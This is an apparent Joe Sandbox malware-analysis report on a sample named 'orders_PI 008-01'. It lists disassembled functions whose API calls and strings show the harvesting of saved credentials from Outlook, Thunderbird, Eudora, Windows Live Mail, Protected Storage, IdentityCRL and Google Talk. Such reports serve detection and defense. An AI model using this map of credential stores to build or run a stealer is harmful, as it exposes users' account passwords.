                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                        • API String ID: 1846531875-4223776976
                                        • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                        • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                        • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                        • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                        Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                          • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                          • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                          • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                        • DeleteObject.GDI32(?), ref: 0040D1A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                        • API String ID: 745651260-375988210
                                        • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                        • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                        • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                        • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                        Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                        • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                        Strings
                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                        • pstorec.dll, xrefs: 00403C30
                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                        • PStoreCreateInstance, xrefs: 00403C44
                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                        • API String ID: 1197458902-317895162
                                        • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                        • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                        • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                        • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                        Function 0044B49F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                        • String ID: h4ND$kGu
                                        • API String ID: 3662548030-565523899
                                        • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                        • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                        • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                        • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                        Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                        • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                        • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                          • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                          • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                          • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                          • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                        • API String ID: 2768085393-1693574875
                                        • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                        • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                        • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                        • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                        Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0044430B
                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                          • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                          • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                          • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                          • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                        • memset.MSVCRT ref: 00444379
                                        • memset.MSVCRT ref: 00444394
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                        • strlen.MSVCRT ref: 004443DB
                                        • _strcmpi.MSVCRT ref: 00444401
                                        Strings
                                        • Store Root, xrefs: 004443A5
                                        • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                        • \Microsoft\Windows Mail, xrefs: 00444329
                                        • \Microsoft\Windows Live Mail, xrefs: 00444350
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                        • API String ID: 832325562-2578778931
                                        • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                        • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                        • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                        • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                        Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                        APIs
                                        • memset.MSVCRT ref: 0040F567
                                        • memset.MSVCRT ref: 0040F57F
                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                        • String ID:
                                        • API String ID: 2012582556-3916222277
                                        • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                        • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                        • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                        • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                        Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                        APIs
                                        • memset.MSVCRT ref: 004037EB
                                        • memset.MSVCRT ref: 004037FF
                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                          • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • strchr.MSVCRT ref: 0040386E
                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                        • strlen.MSVCRT ref: 00403897
                                        • sprintf.MSVCRT ref: 004038B7
                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                        • String ID: %s@yahoo.com
                                        • API String ID: 317221925-3288273942
                                        • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                        • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                        • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                        • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                        Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                        APIs
                                        • memset.MSVCRT ref: 00403504
                                        • memset.MSVCRT ref: 0040351A
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                        • _mbscat.MSVCRT ref: 0040356D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscatmemset$Close_mbscpystrlen
                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                        • API String ID: 3071782539-966475738
                                        • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                        • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                        • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                        • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                        Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                        • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                        • DeleteObject.GDI32(?), ref: 0040CD5A
                                        • memset.MSVCRT ref: 0040CD96
                                        • LoadIconA.USER32(00000065), ref: 0040CDA6
                                        • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                        • String ID:
                                        • API String ID: 2054149589-0
                                        • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                        • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                        Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                        APIs
                                        • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                          • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                          • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                        Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00408620
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • memset.MSVCRT ref: 00408671
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                        • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                        Strings
                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                        • String ID: Software\Google\Google Talk\Accounts
                                        • API String ID: 1366857005-1079885057
                                        • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
